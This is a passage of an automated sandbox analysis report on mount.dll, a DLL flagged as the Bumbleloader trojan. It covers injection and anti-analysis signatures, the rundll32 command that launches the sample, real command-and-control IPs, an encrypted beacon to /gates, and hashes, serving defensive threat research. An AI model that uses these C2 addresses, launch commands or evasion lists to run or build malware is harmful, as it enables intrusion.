                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338844530 SetUnhandledExceptionFilter,4_2_000001C338844530
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3388119BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000001C3388119BC

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 91.122.18.192 443Jump to behavior
                    Searches for specific processes (likely to inject)
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30210E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,StrCmpIW,Process32NextW,CloseHandle,FindCloseChangeNotification,3_2_0000021EF30210E0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387210E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,StrCmpIW,Process32NextW,CloseHandle,FindCloseChangeNotification,4_2_000001C3387210E0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mount.dll",#1Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3127160 GetSystemTimeAsFileTime,3_2_0000021EF3127160
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3020770 GetUserNameW,3_2_0000021EF3020770
                    Source: rundll32.exeBinary or memory string: procmon.exe
                    Source: rundll32.exeBinary or memory string: tcpview.exe
                    Source: rundll32.exeBinary or memory string: Wireshark.exe
                    Source: rundll32.exeBinary or memory string: procexp.exe
                    Source: rundll32.exeBinary or memory string: LordPE.exe
                    Source: rundll32.exeBinary or memory string: autoruns.exe
                    Source: rundll32.exeBinary or memory string: ollydbg.exe
                    Source: rundll32.exeBinary or memory string: regmon.exe

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts2
                    Windows Management Instrumentation                    		Path Interception211
                    Process Injection                    		331
                    Virtualization/Sandbox Evasion                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		Exfiltration Over Other Network Medium21
                    Encrypted Channel                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts2
                    Command and Scripting Interpreter                    		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts211
                    Process Injection                    		LSASS Memory1
                    Query Registry                    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                    Ingress Tool Transfer                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts1
                    Native API                    		Logon Script (Windows)Logon Script (Windows)1
                    Deobfuscate/Decode Files or Information                    		Security Account Manager541
                    Security Software Discovery                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Non-Application Layer Protocol                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                    Obfuscated Files or Information                    		NTDS331
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput CaptureScheduled Transfer12
                    Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Rundll32                    		LSA Secrets11
                    Process Discovery                    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                    Account Discovery                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                    System Owner/User Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    Remote System Discovery                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                    System Network Configuration Discovery                    		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing22
                    System Information Discovery                    		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    mount.dll49%VirustotalBrowse
                    mount.dll23%MetadefenderBrowse
                    mount.dll77%ReversingLabsWin64.Trojan.Bumbleloader
                    mount.dll100%AviraTR/Crypt.Agent.ogakg

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    91.122.18.192:4430%VirustotalBrowse
                    91.122.18.192:4430%Avira URL Cloudsafe
                    282.19.133.12:4430%Avira URL Cloudsafe
                    72.123.65.11:4430%VirustotalBrowse
                    72.123.65.11:4430%Avira URL Cloudsafe
                    149.255.35.167:4430%Avira URL Cloudsafe
                    185.156.172.62:4430%Avira URL Cloudsafe
                    172.241.27.146:4430%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    91.122.18.192:443true
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    282.19.133.12:443true
                    • Avira URL Cloud: safe
                    		unknown
                    72.123.65.11:443true
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    149.255.35.167:443true
                    • Avira URL Cloud: safe
                    		unknown
                    185.156.172.62:443true
                    • Avira URL Cloud: safe
                    		unknown
                    172.241.27.146:443true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.openssl.org/docs/faq.htmlrundll32.exe, 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      91.122.18.192
                      		unknownRussian Federation
                      		12389ROSTELECOM-ASRUtrue
                      185.156.172.62
                      		unknownRomania
                      		9009M247GBtrue

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:622711
                      Start date and time: 09/05/202216:07:152022-05-09 16:07:15 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 13m 2s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:mount.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:21
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winDLL@9/0@0/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 69.1% (good quality ratio 53.9%)
                      • Quality average: 50.3%
                      • Quality standard deviation: 34.9%
                      HCA Information:
                      • Successful, ratio: 87%
                      • Number of executed functions: 76
                      • Number of non-executed functions: 284
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32

                      Warnings

                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 80.67.82.211, 80.67.82.235
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, a1449.dscg2.akamai.net, arc.msn.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      16:08:34API Interceptor1x Sleep call for process: loaddll64.exe modified
                      16:09:23API Interceptor671x Sleep call for process: rundll32.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      91.122.18.192mount.dllGet hashmaliciousBrowse
                        mount.dllGet hashmaliciousBrowse
                          mount.dllGet hashmaliciousBrowse
                            mount.dllGet hashmaliciousBrowse
                              185.156.172.62mount.dllGet hashmaliciousBrowse
                                mount.dllGet hashmaliciousBrowse
                                  mount.dllGet hashmaliciousBrowse
                                    mount.dllGet hashmaliciousBrowse

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      ROSTELECOM-ASRUmount.dllGet hashmaliciousBrowse
                                      • 91.122.18.192
                                      mount.dllGet hashmaliciousBrowse
                                      • 91.122.18.192
                                      k95nIyIQCmGet hashmaliciousBrowse
                                      • 176.49.59.102
                                      seTP2VCP4fGet hashmaliciousBrowse
                                      • 95.37.181.16
                                      BP1566jQZsGet hashmaliciousBrowse
                                      • 46.41.114.98
                                      VJ11IcTTthGet hashmaliciousBrowse
                                      • 5.137.161.18
                                      brUbUoQOtwGet hashmaliciousBrowse
                                      • 5.140.107.220
                                      arm7Get hashmaliciousBrowse
                                      • 5.139.188.145
                                      armGet hashmaliciousBrowse
                                      • 5.140.74.109
                                      xNyFxxdS3GGet hashmaliciousBrowse
                                      • 85.112.60.25
                                      068iG6omAZGet hashmaliciousBrowse
                                      • 92.127.36.199
                                      sora.armGet hashmaliciousBrowse
                                      • 46.48.175.147
                                      fWCUITrAYVGet hashmaliciousBrowse
                                      • 95.189.89.245
                                      sora.x86Get hashmaliciousBrowse
                                      • 188.17.255.67
                                      i686Get hashmaliciousBrowse
                                      • 37.21.121.158
                                      2H520xbTpsGet hashmaliciousBrowse
                                      • 85.112.59.36
                                      RmkMWdyG4BGet hashmaliciousBrowse
                                      • 95.55.190.164
                                      N5UTSFm7o4Get hashmaliciousBrowse
                                      • 95.71.223.66
                                      1ouTsAgnDxGet hashmaliciousBrowse
                                      • 31.163.252.10
                                      TDtAHPtakCGet hashmaliciousBrowse
                                      • 94.233.211.128
                                      M247GBmount.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      mount.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      seTP2VCP4fGet hashmaliciousBrowse
                                      • 38.202.225.77
                                      gsBmFpaYs0Get hashmaliciousBrowse
                                      • 206.127.222.218
                                      vC2rgBSU2pGet hashmaliciousBrowse
                                      • 206.127.222.215
                                      k9nvsaxuSXGet hashmaliciousBrowse
                                      • 38.202.83.219
                                      mount.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      RCVVJ1sq5QGet hashmaliciousBrowse
                                      • 45.11.2.208
                                      b6YSeNoCTZGet hashmaliciousBrowse
                                      • 196.16.207.245
                                      beamer.x86-20220504-2050Get hashmaliciousBrowse
                                      • 193.142.58.171
                                      beamer.arm7-20220504-2050Get hashmaliciousBrowse
                                      • 193.142.58.171
                                      beamer.arm-20220504-2050Get hashmaliciousBrowse
                                      • 193.142.58.171
                                      qN2AhGteDJGet hashmaliciousBrowse
                                      • 38.202.251.238
                                      ScanCopy-09876AWB#732606323042022.exeGet hashmaliciousBrowse
                                      • 5.181.234.149
                                      SpNP9db6KA.exeGet hashmaliciousBrowse
                                      • 193.142.58.38
                                      KEie4St7TtGet hashmaliciousBrowse
                                      • 193.189.74.114
                                      VPSdxXGBLmGet hashmaliciousBrowse
                                      • 196.16.120.137
                                      arm7Get hashmaliciousBrowse
                                      • 172.102.214.45
                                      sora.x86Get hashmaliciousBrowse
                                      • 128.0.1.51
                                      Linux_x86Get hashmaliciousBrowse
                                      • 193.189.74.114

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      0c9457ab6f0d6a14fc8a3d1d149547fbmount.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      mount.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      kiol5.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      regina.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      mount.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      3b2ysotXlq.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      12.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      13.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      14.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      16.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      17.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      18.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      19.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      20.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      8.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      9.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      10.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      11.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      5.dllGet hashmaliciousBrowse
                                      • 185.156.172.62
                                      6.dllGet hashmaliciousBrowse
                                      • 185.156.172.62

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      No created / dropped files found

                                      Static File Info

                                      General

                                      File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                      Entropy (8bit):5.559897819745863
                                      TrID:
                                      • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                      • Win64 Executable (generic) (12005/4) 10.17%
                                      • Generic Win/DOS Executable (2004/3) 1.70%
                                      • DOS Executable Generic (2002/1) 1.70%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                      File name:mount.dll
                                      File size:3846656
                                      MD5:8e7115ea580f39c152e4d4bc4472c402
                                      SHA1:4ea1f1d8a01f251fa5db350f72b04a1d11028fb0
                                      SHA256:c65c51ed60f91a92789c4b056821ef51252baa2a1679a6513ab008acf0464ccb
                                      SHA512:bde81a4da80dda9e06815b153caa2dcaea874bfd973c9d24b1e935e0c88a0d094dcce0b153d9866a87b2b06bc636a30b23d3fe27e345b4a2ee174b52acc44619
                                      SSDEEP:98304:XZo5q0spyUTJkqVnIY0z7ceiVNhPvpx3:XZwqlp51krrz4vp
                                      TLSH:DD066CF69CC8A15BBC54ECCDF736C570409BAD09F9DFC80789A4162B5888139E79F688
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........d.U...U...U....h..V...U...B.......Q.......T.......T...RichU...........................PE..d....4ab.........." .....j...D:....

                                      File Icon

                                      Icon Hash:74f0e4ecccdce0e4

                                      Static PE Info

                                      General

                                      Entrypoint:0x180001000
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x180000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                      Time Stamp:0x6261340F [Thu Apr 21 10:38:07 2022 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:a5d156f0c03955fd5c90a10345646746

                                      Entrypoint Preview

                                      Instruction
                                      mov eax, 00000001h
                                      ret
                                      int3
                                      int3
                                      dec eax
                                      mov dword ptr [esp+08h], esi
                                      push edi
                                      dec eax
                                      sub esp, 20h
                                      dec ecx
                                      mov eax, dword ptr [eax+38h]
                                      dec ecx
                                      mov esi, eax
                                      dec ecx
                                      mov edx, dword ptr [eax+00000148h]
                                      dec ecx
                                      mov ecx, dword ptr [eax+00000210h]
                                      dec eax
                                      add ecx, 00000370h
                                      inc esp
                                      mov ecx, dword ptr [eax]
                                      and dword ptr [esp+40h], 00000000h
                                      inc ecx
                                      sub ecx, 000018A6h
                                      dec eax
                                      mov eax, dword ptr [edx+00000128h]
                                      dec eax
                                      imul eax, ecx
                                      dec ecx
                                      arpl cx, di
                                      dec esp
                                      lea ecx, dword ptr [esp+40h]
                                      dec eax
                                      mov dword ptr [edx+00000128h], eax
                                      dec eax
                                      mov edx, edi
                                      dec ecx
                                      mov eax, dword ptr [eax+000001A8h]
                                      dec ecx
                                      mov ecx, dword ptr [eax+00000210h]
                                      dec eax
                                      or dword ptr [ecx+00000368h], eax
                                      dec ecx
                                      mov eax, dword ptr [eax+00000210h]
                                      dec ecx
                                      inc dword ptr [eax+000001A8h]
                                      dec eax
                                      imul ecx, dword ptr [eax+50h], 0000148Eh
                                      dec ecx
                                      mov eax, dword ptr [eax+08h]
                                      dec ecx
                                      add dword ptr [eax+00000378h], ecx
                                      dec eax
                                      mov ecx, dword ptr [esp+50h]
                                      inc esp
                                      mov eax, dword ptr [eax+30h]
                                      inc ecx
                                      sub eax, 00001873h
                                      call dword ptr [esi+000003B8h]
                                      dec eax
                                      mov edx, dword ptr [esp+58h]
                                      dec esp
                                      mov eax, edi
                                      dec eax
                                      mov ecx, dword ptr [esp+50h]
                                      call 00007F21F4BEA925h
                                      inc esp
                                      mov eax, dword ptr [esp+40h]
                                      dec esp
                                      lea ecx, dword ptr [esp+40h]
                                      dec eax
                                      mov ecx, dword ptr [esp+50h]

                                      Rich Headers

                                      Programming Language:
                                      • [C++] VS2015 UPD3.1 build 24215
                                      • [EXP] VS2015 UPD3.1 build 24215
                                      • [LNK] VS2015 UPD3.1 build 24215

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x1fac000x50.rdata
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1fac500x28.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3ad0000x114.pdata
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x1faa100x1c.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000xc0.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x68430x6a00False0.578530365566COM executable for DOS5.84683219257IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rdata0x80000x1f2eea0x1f3000False0.480568558993data4.28896463003IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x1fb0000x1b11080x1b1200False0.556410646645data4.83832650038IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                      .pdata0x3ad0000x1140x200False0.3984375data2.60863721977IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Imports

                                      DLLImport
                                      KERNEL32.dllGetCommandLineA, CreateFileA, FindFirstFileA, FindNextFileA, GetFileAttributesA, GetFileInformationByHandle, WriteFile, CloseHandle, HeapAlloc, HeapFree, GetProcessHeap, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, ExitProcess, GetCurrentThreadId, GetModuleFileNameA, GetModuleHandleExA, GetProcAddress, SwitchToFiber, DeleteFiber, CreateFiber, LoadLibraryA

                                      Exports

                                      NameOrdinalAddress
                                      shjKeAQfgT10x1800012bc

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      May 9, 2022 16:09:17.827095985 CEST49758443192.168.2.491.122.18.192
                                      May 9, 2022 16:09:17.827162981 CEST4434975891.122.18.192192.168.2.4
                                      May 9, 2022 16:09:17.827291965 CEST49758443192.168.2.491.122.18.192
                                      May 9, 2022 16:09:17.827639103 CEST49758443192.168.2.491.122.18.192
                                      May 9, 2022 16:09:17.827671051 CEST4434975891.122.18.192192.168.2.4
                                      May 9, 2022 16:11:28.968981028 CEST4434975891.122.18.192192.168.2.4
                                      May 9, 2022 16:11:29.361627102 CEST49773443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.361697912 CEST44349773185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.361830950 CEST49773443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.362123013 CEST49773443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.362163067 CEST44349773185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.428570032 CEST44349773185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.428760052 CEST49773443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.431251049 CEST49773443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.431265116 CEST44349773185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.431530952 CEST44349773185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.431761980 CEST49773443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.431869030 CEST44349773185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.431922913 CEST44349773185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.432178974 CEST49773443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.432670116 CEST49773443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.432683945 CEST44349773185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.456352949 CEST49774443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.456403971 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.456520081 CEST49774443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.456871033 CEST49774443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.456902027 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.511542082 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.511697054 CEST49774443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.514111996 CEST49774443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.514137983 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.514398098 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.515578985 CEST49774443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.556520939 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.556704044 CEST49774443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.556724072 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.898237944 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.898309946 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.898376942 CEST49774443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.898647070 CEST49774443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.898664951 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:30.249600887 CEST49775443192.168.2.491.122.18.192
                                      May 9, 2022 16:11:30.249660015 CEST4434977591.122.18.192192.168.2.4
                                      May 9, 2022 16:11:30.249767065 CEST49775443192.168.2.491.122.18.192
                                      May 9, 2022 16:11:30.250150919 CEST49775443192.168.2.491.122.18.192
                                      May 9, 2022 16:11:30.250170946 CEST4434977591.122.18.192192.168.2.4

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.449774185.156.172.62443C:\Windows\System32\rundll32.exe
                                      TimestampkBytes transferredDirectionData
                                      2022-05-09 14:11:29 UTC0OUTGET /gates HTTP/1.1
                                      2022-05-09 14:11:29 UTC0OUTData Raw: 48 6f 73 74 3a 20 31 38 35 2e 31 35 36 2e 31 37 32 2e 36 32 0d 0a
                                      Data Ascii: Host: 185.156.172.62
                                      2022-05-09 14:11:29 UTC0OUTData Raw: 55 73 65 72 2d 41 67 65 6e 74 3a 20 4a 6e 41 69 4b 53 44 79 43 44 0d 0a
                                      Data Ascii: User-Agent: JnAiKSDyCD
                                      2022-05-09 14:11:29 UTC0OUTData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 37 37 0d 0a
                                      Data Ascii: Content-Length: 177
                                      2022-05-09 14:11:29 UTC0OUTData Raw: 0d 0a
                                      Data Ascii:
                                      2022-05-09 14:11:29 UTC0OUTData Raw: 0d dd 87 07 ce f9 79 70 ef 3f e9 7d b8 98 0d 8a 4b cb 32 73 e5 bd 2d 3a 91 24 b2 e5 f0 87 90 19 6d f2 11 38 ce 93 01 7b 2b 74 3e 27 2f 0b e6 4d 49 21 f6 f2 ee ad f7 98 dd 00 58 70 c2 67 a3 43 e0 c1 c0 e1 a2 ad b7 f7 21 23 25 93 39 ca 70 14 8f 82 e3 96 14 aa 54 79 5e e0 ac 70 e1 44 08 88 31 b9 0d fe d9 19 39 bc ae 8c b3 fb e4 22 6a e5 f2 77 26 aa c5 a7 d3 40 b6 7e c1 78 b6 cf 69 ca 11 bd 26 0a ad ab fd 72 6a d2 09 3b 16 f0 64 6b e7 60 1b 06 f2 0c f2 e4 61 1f cb aa e9 e3 e4 95 56 a1 67 9c bb 33 3b 97 a6 46 df 37 1d bf 84 79 dd
                                      Data Ascii: yp?}K2s-:$m8{+t>'/MI!XpgC!#%9pTy^pD19"jw&@~xi&rj;dk`aVg3;F7y
                                      2022-05-09 14:11:29 UTC0INHTTP/1.1 200 OK
                                      content-type: application/json
                                      date: Mon, 09 May 2022 14:11:29 GMT
                                      content-length: 34
                                      connection: close
                                      2022-05-09 14:11:29 UTC0INData Raw: 0d dd 96 0e d4 ec 78 6a c3 33 d2 2c f6 db 1c ce 0f 88 3d 71 ff f9 6f 38 d1 29 f3 f3 fa 8f 83 4d 36 eb
                                      Data Ascii: xj3,=qo8)M6


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:16:08:28
                                      Start date:09/05/2022
                                      Path:C:\Windows\System32\loaddll64.exe
                                      Wow64 process (32bit):false
                                      Commandline:loaddll64.exe "C:\Users\user\Desktop\mount.dll"
                                      Imagebase:0x7ff68f9b0000
                                      File size:140288 bytes
                                      MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Target ID:1
                                      Start time:16:08:28
                                      Start date:09/05/2022
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mount.dll",#1
                                      Imagebase:0x7ff7bb450000
                                      File size:273920 bytes
                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                      Has elevated privileges:true
